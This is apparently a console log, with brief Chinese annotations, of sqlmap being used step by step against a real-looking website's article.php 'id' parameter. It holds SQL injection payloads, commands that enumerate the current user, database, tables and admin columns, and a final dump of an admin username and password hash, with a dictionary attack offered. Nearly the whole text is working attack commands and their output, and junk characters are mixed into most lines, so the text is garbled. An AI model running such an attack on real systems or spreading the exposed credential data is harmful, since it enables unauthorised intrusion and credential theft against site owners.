D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! u7 Q# W7 t) O: O# i
ms "Mysql" --current-user /* 注解:获取当前用户名称
$ F. l9 O5 N8 T y9 n! h: q sqlmap/0.9 - automatic SQL injection and database takeover tool4 o$ j8 f; c- u l. i3 B! ~
http://sqlmap.sourceforge.net starting at: 16:53:54
+ s/ b. j4 r, j* }* _[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 V# W5 m% c! ?" u6 @& Z
session file
0 I. Q4 F+ ], h) @[16:53:54] [INFO] resuming injection data from session file2 p4 V1 y0 k" ~
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 \/ Y+ {2 _, e( z3 t: _' g+ E
[16:53:54] [INFO] testing connection to the target url
# o8 _) D& b1 X gsqlmap identified the following injection points with a total of 0 HTTP(s) reque6 J/ R' l9 B1 [6 D
sts:: }# x, y4 \0 P/ V! T
---& F# f' g* Q/ p7 j# ~/ H! k. Q5 i
Place: GET) S3 H8 `/ u2 g. w$ g# j& i, |
Parameter: id
: \& w6 [+ s5 {) P' d+ {* h( h Type: boolean-based blind
( u! A8 t. M* W Title: AND boolean-based blind - WHERE or HAVING clause- r9 ]" j% d ~6 G9 V4 j% ~
Payload: id=276 AND 799=799
; I1 i0 {( v# |/ P' @* f: k5 Q Type: error-based |- z8 e- c) O4 |/ n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( b- M S* b, J2 ?" ?8 f/ ~ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ Z) l+ w$ q4 I$ {1 h' z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
`- I. l+ c. C8 A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 e" M4 L! k" J ]
Type: UNION query
* Z) {# V# m" [+ } a) b; X$ z" ~ Title: MySQL UNION query (NULL) - 1 to 10 columns9 E& n: N! }# {% g4 k L2 ?/ {8 Y! J
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 _; G3 t/ R+ ~5 E- _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* n* l, B" V' y O5 d) ^* }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: ^6 ~1 j9 Q& d7 T& {( H* R Type: AND/OR time-based blind W9 ~) q+ [5 N2 Z. v0 P' J/ ]8 ?, u
Title: MySQL > 5.0.11 AND time-based blind
. A' K4 |' U& }. B1 d4 W% i9 J Payload: id=276 AND SLEEP(5)
7 s- {* Y6 @9 o) z0 g---
* y& n! j- I0 V: r& K, p1 y7 Q[16:53:55] [INFO] the back-end DBMS is MySQL. U0 [) k9 D/ ~3 ]3 b: D
web server operating system: Windows2 e" L1 M$ L0 j W
web application technology: Apache 2.2.11, PHP 5.3.0
. m1 n: s/ \6 Z% |" F v- A! _3 b9 Lback-end DBMS: MySQL 5.0
5 d5 ~! v' p( w$ e- p$ T[16:53:55] [INFO] fetching current user
' w3 k( v, Q. c: h. h; I8 Lcurrent user: 'root@localhost' 1 n1 b$ P; q% q! Q- g1 P. y
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
7 a8 ?3 \' i- h8 Q d+ Ytput\www.wepost.com.hk' shutting down at: 16:53:58' W' r/ y6 |+ [+ T9 s
6 `3 S' } A. ] ?/ u4 B- J
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. H- s5 M, ]5 s* mms "Mysql" --current-db /*当前数据库9 t. Z) w" p. u4 v+ w: `
sqlmap/0.9 - automatic SQL injection and database takeover tool3 j, d+ Q0 b$ B: E3 j0 W
http://sqlmap.sourceforge.net starting at: 16:54:16
* X; d0 Z e5 Z) d& f) D% b% M! i[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 T4 m7 V9 }+ w
session file7 H/ M# i+ o0 s1 m8 C# L: E& ]
[16:54:16] [INFO] resuming injection data from session file
! F. q7 m! c9 S# O4 n: j+ s+ g' Y[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: ]* }+ \% T1 r1 H( c/ n
[16:54:16] [INFO] testing connection to the target url
& \) b* {) E$ N5 a2 I* |sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 V! c, r0 f# p- v& R* m
sts:! |5 v0 Z+ G& [0 p
---
/ T5 S2 H3 [# \# n" V$ ePlace: GET5 q m) u1 i/ N
Parameter: id8 q& P9 x* V G; e; V8 ^
Type: boolean-based blind
8 X% k% I* \& y/ b Title: AND boolean-based blind - WHERE or HAVING clause
& @) a& A, C: {& R Payload: id=276 AND 799=799
u$ l/ e8 X! ^+ a2 q! y, k* u- I Type: error-based% U: R3 s/ g" g) s* k( ~7 u
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 s4 {; q. j+ i- V( E) D Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ e, S9 m$ t/ @0 W2 Q$ a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 L9 K; f7 ~% ?6 V3 Y$ G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! x; q7 W- e& B$ P4 @7 X Type: UNION query @+ k( v6 n& J R& H) `
Title: MySQL UNION query (NULL) - 1 to 10 columns; f& P2 P: v& m, G/ N3 g/ S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! l+ u" u) d0 F4 c# ^; f, a1 l
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) c5 a( \3 X. E7 `5 q7 @CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 U- a" |- r$ U1 x Type: AND/OR time-based blind
, p6 E0 v( g: n4 |; ]4 s3 ~ Title: MySQL > 5.0.11 AND time-based blind+ D& n3 t( J9 @( Y$ }& _
Payload: id=276 AND SLEEP(5)
* k. J* i' @* M. Q" ^---8 i$ }. e/ v# V+ q: V/ V, |
[16:54:17] [INFO] the back-end DBMS is MySQL
! }, o2 ]" g O7 b) z a9 @web server operating system: Windows
5 a1 O. H/ |; I3 `' R( l; e+ `6 fweb application technology: Apache 2.2.11, PHP 5.3.0. S8 w; n6 F$ Q: C9 b% @
back-end DBMS: MySQL 5.0* `+ I- N6 S+ x+ W6 H
[16:54:17] [INFO] fetching current database
6 C% n, o7 q8 M4 C7 I+ O5 vcurrent database: 'wepost'. G( H3 p9 P- P0 z6 N
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& m% {) @$ C. ]; y k
tput\www.wepost.com.hk' shutting down at: 16:54:18 c5 @# g [' s, I0 o
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
t9 ?# p6 A' yms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
9 d1 a4 _2 r( e0 Q7 H0 G7 [ sqlmap/0.9 - automatic SQL injection and database takeover tool6 Q. z* r" ^5 Z6 b+ L. a8 g5 s+ w
http://sqlmap.sourceforge.net starting at: 16:55:254 _1 |$ _" w N% ]$ W
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
* A; C* t3 `; G2 t6 m session file. W/ i5 I; E( T2 b- A
[16:55:25] [INFO] resuming injection data from session file
* q p+ ?/ ^( c) Z[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ @) Q% ^6 m: m# J: E1 U
[16:55:25] [INFO] testing connection to the target url
* Q. D& ]4 E7 W& ? n: I) W# ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque, J; f9 p) n+ D! y2 |# K$ Z& z/ Q
sts:1 ~1 C9 e$ ?0 {3 [; e6 s
---
h6 Z" y( S- \0 IPlace: GET& N* _( U( G( H d
Parameter: id
5 A! l0 D9 j8 {1 U: U) h: p Type: boolean-based blind
# E3 U5 R; m' _4 b- z+ U Title: AND boolean-based blind - WHERE or HAVING clause5 m" T/ ^! J" e/ w/ y0 j& V2 w) m
Payload: id=276 AND 799=799
6 X/ Y) o* F$ H+ a; A5 m$ K; I Type: error-based% `& ?8 D) ~. X# `3 c! q7 r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 [* {7 u4 I3 B- ~& f6 T( v1 T; p2 R/ y% Q" v Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ M7 v- D1 z: A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# y% x# g. N c8 P! g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ X/ X+ U/ u2 {( W Type: UNION query
3 Q- F( Y" @8 B Title: MySQL UNION query (NULL) - 1 to 10 columns- m+ }- z- i. d! J; r
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! S- J3 @" t9 }* t2 u% p& k7 @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! K9 s. }! J4 R! e
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' G0 d* K- z3 T% l Type: AND/OR time-based blind
8 C2 D$ t3 J/ ] f+ x* f* O Title: MySQL > 5.0.11 AND time-based blind9 w" G) f$ K5 O1 V7 i X
Payload: id=276 AND SLEEP(5)' m, s, Z* c: ^. j4 h
---
6 V8 E/ p; `, z; Q! S& m' O[16:55:26] [INFO] the back-end DBMS is MySQL# h7 Q' B$ v0 Q2 o; ~# H% T
web server operating system: Windows
& C1 u' W6 s6 L( ^8 o9 \/ Iweb application technology: Apache 2.2.11, PHP 5.3.0
+ v1 b, z) {% J$ a0 w* E( L: {2 t) Oback-end DBMS: MySQL 5.06 \8 E5 M9 R* q, c1 ^
[16:55:26] [INFO] fetching tables for database 'wepost'
* \$ {4 {1 T' Y% H, V[16:55:27] [INFO] the SQL query used returns 6 entries) y2 a6 j6 b6 W p' N
Database: wepost5 D* b# Z; j+ o( s2 m
[6 tables]
5 p6 ]' J1 R9 Q0 Y* M$ w+-------------+- {$ V! {+ w3 z- f9 B/ o1 c
| admin |7 e( }1 b; }" t. d7 `, `- ~
| article |- Q4 L" F: I$ s V) B+ c
| contributor |
6 u6 E& \! F9 d1 q- a1 g: x1 L| idea | \+ E' _0 w5 B0 ?' }- w0 h
| image |4 M7 @# I. j& v, B: K/ ^" e3 _
| issue | a1 o; ?, T. L3 H$ m4 s
+-------------+
2 u9 B7 { p/ I[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 D" V- [# v8 |6 X/ z/ ]! m' Y- _tput\www.wepost.com.hk' shutting down at: 16:55:33
1 [% m5 o) z2 k. Y
& x- |& ^ s! [. [1 a* AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 m; h' K0 M4 l+ n, F+ s
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名 q. g( R2 r: p2 z# ]! `% S
sqlmap/0.9 - automatic SQL injection and database takeover tool
" ]: ?3 N8 Q& k Q0 a http://sqlmap.sourceforge.net starting at: 16:56:068 k: }5 s" w3 _, e- d( r: z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
# | q1 C) ~, bsts:4 `; O* B& F- x: R* H& |
---
' a. a" W3 h- q1 d8 RPlace: GET
$ s+ N! J5 Z" t" ?Parameter: id* E6 E& v# ] c% q( }
Type: boolean-based blind
* L. x& o' i# j) P5 y% ?! k' ~ Title: AND boolean-based blind - WHERE or HAVING clause
8 j' d; {6 G, ~) T& w Payload: id=276 AND 799=799
# @/ J( ~ h" q1 [ U O0 k Type: error-based
' ~, n/ G8 ]1 W" D9 O% u Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: P& K- g1 d+ v, z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& P% p( Z. w2 M6 P+ D120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ I, a1 X& f- [
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ ]. |" D) U* V9 S# g Type: UNION query4 b) p4 u0 u) Z
Title: MySQL UNION query (NULL) - 1 to 10 columns7 ~4 z2 K4 y3 b- k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ `: X" t! i( p- k, D. ?" S& R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; W p; Q0 K% {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 n7 ^2 J; M" F% B' T2 N
Type: AND/OR time-based blind
8 z$ ?" m7 O! ^! q; C Title: MySQL > 5.0.11 AND time-based blind
5 s0 Y/ T; w! @ u, D- Z Payload: id=276 AND SLEEP(5)
" s( G- a% d* {! E8 h2 ]# c---2 E. U. d7 _9 @7 c; A/ W/ |
web server operating system: Windows& u% [' y! e2 c8 v
web application technology: Apache 2.2.11, PHP 5.3.0
0 u$ L% t' V$ d. {back-end DBMS: MySQL 5.0
; a1 ]* j6 w T[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
1 X: f1 E7 A( r, J* X; }: I9 F4 C3 ]9 E4 Zssion': wepost, wepost
* h; @8 U$ f+ v/ Y+ FDatabase: wepost1 w/ \- E. g9 M) n9 | G
Table: admin( h& M" s, s( b( H4 O5 U$ c+ t; p
[4 columns]5 U! z, B' `: \" t9 i2 b* g1 J
+----------+-------------+$ C7 T ^1 y3 c) @2 ~/ K, f
| Column | Type |. D- j; B: V4 V1 S, b# ]
+----------+-------------+
: t, ~; n% l' e4 e- q' k: Y| id | int(11) |
' ?. f) d: I, ]' ~* l# D O% D| password | varchar(32) |
, ^4 k& d/ g! ]( b/ Y1 H+ f| type | varchar(10) |
- C. y+ X0 a/ v+ F" u| userid | varchar(20) |
. R p7 S, m3 Z" W. x8 O/ Y/ Y' B+----------+-------------+
+ P! m7 D5 g: Y1 B2 Z shutting down at: 16:56:19# s+ Z+ s+ `2 o, b
9 w2 F9 \/ Y8 j5 C6 ^; F VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ B0 R9 W+ I1 o% C, {, `ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
* y; y" \3 v0 e1 _$ {4 k sqlmap/0.9 - automatic SQL injection and database takeover tool- V/ F/ S3 ^0 s$ H& s
http://sqlmap.sourceforge.net starting at: 16:57:14
0 I1 C, V1 S6 g1 o/ x" y. q9 g. Msqlmap identified the following injection points with a total of 0 HTTP(s) reque( A S3 n- d8 d" @) K) Y, |! J2 d
sts:7 R1 n u& D- S
---( m! E$ ~" m: X; K8 X
Place: GET
+ C' ]6 Z" U2 [' |Parameter: id- k# w9 x% z/ c) l$ F* w
Type: boolean-based blind
7 O/ y6 f' S: Y k5 C6 _ Title: AND boolean-based blind - WHERE or HAVING clause, w$ n1 I: e4 q# _, T8 s3 @0 w+ r
Payload: id=276 AND 799=799
, c/ l6 i$ ?# d, E+ ^! b" [! E! f Type: error-based1 a; W3 |9 W& @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ N4 `& _2 s! T4 e6 {" x0 S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! ~% B7 q* G1 f5 F120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 q) {8 u, c6 s) K& W( J' m: X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ h* Q3 w# d; }$ _; P: e
Type: UNION query
+ j' _0 i/ i8 S* X. S9 X+ x d* [4 ? Title: MySQL UNION query (NULL) - 1 to 10 columns
& o G* N. j( Y! V C- A, d Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) S5 W, {8 f# J B* y% A4 z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; `. T0 Y1 ], m8 d& K7 i
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, r8 ~- S0 t. e" F6 t; M* ^. ` Type: AND/OR time-based blind
" f& V( l+ G# U Title: MySQL > 5.0.11 AND time-based blind$ c! a5 k8 g0 i, P
Payload: id=276 AND SLEEP(5)
- w9 S5 W2 J& ?$ N; B2 b---
& V" h! `2 w1 C. B2 Bweb server operating system: Windows
% b) I* ~/ E/ D+ P5 z) j* W4 c5 }& Rweb application technology: Apache 2.2.11, PHP 5.3.0+ E! i2 R9 N% G/ r; h9 m& C
back-end DBMS: MySQL 5.0
0 |9 A/ ]/ W) ?recognized possible password hash values. do you want to use dictionary attack o
3 \% l) x& g3 J3 i% ^n retrieved table items? [Y/n/q] y
: {$ x2 O5 D* ?% g1 f2 W7 ~what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
3 }3 }9 f8 e% I3 s5 V( |8 }do you want to use common password suffixes? (slow!) [y/N] y9 y- n) k7 V& o6 F+ r0 U$ w
Database: wepost
( ?9 `: M! Y( JTable: admin
# Q0 A. L( o5 o5 ]$ d/ @[1 entry]5 `4 }$ O) m& [. C2 l& H
+----------------------------------+------------+
% ~$ e4 d6 }- O| password | userid |6 W" O- Y7 u! Q* H
+----------------------------------+------------+
5 ^! h/ l3 z# o9 }| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |) B; b" P0 ?' [
+----------------------------------+------------+
- g9 R$ u$ ?$ g- U" W& Q6 y+ o9 C shutting down at: 16:58:14
, H* S$ D9 V- \" p/ P
5 f+ u4 x0 |+ r$ I, X. T, w9 aD:\Python27\sqlmap> |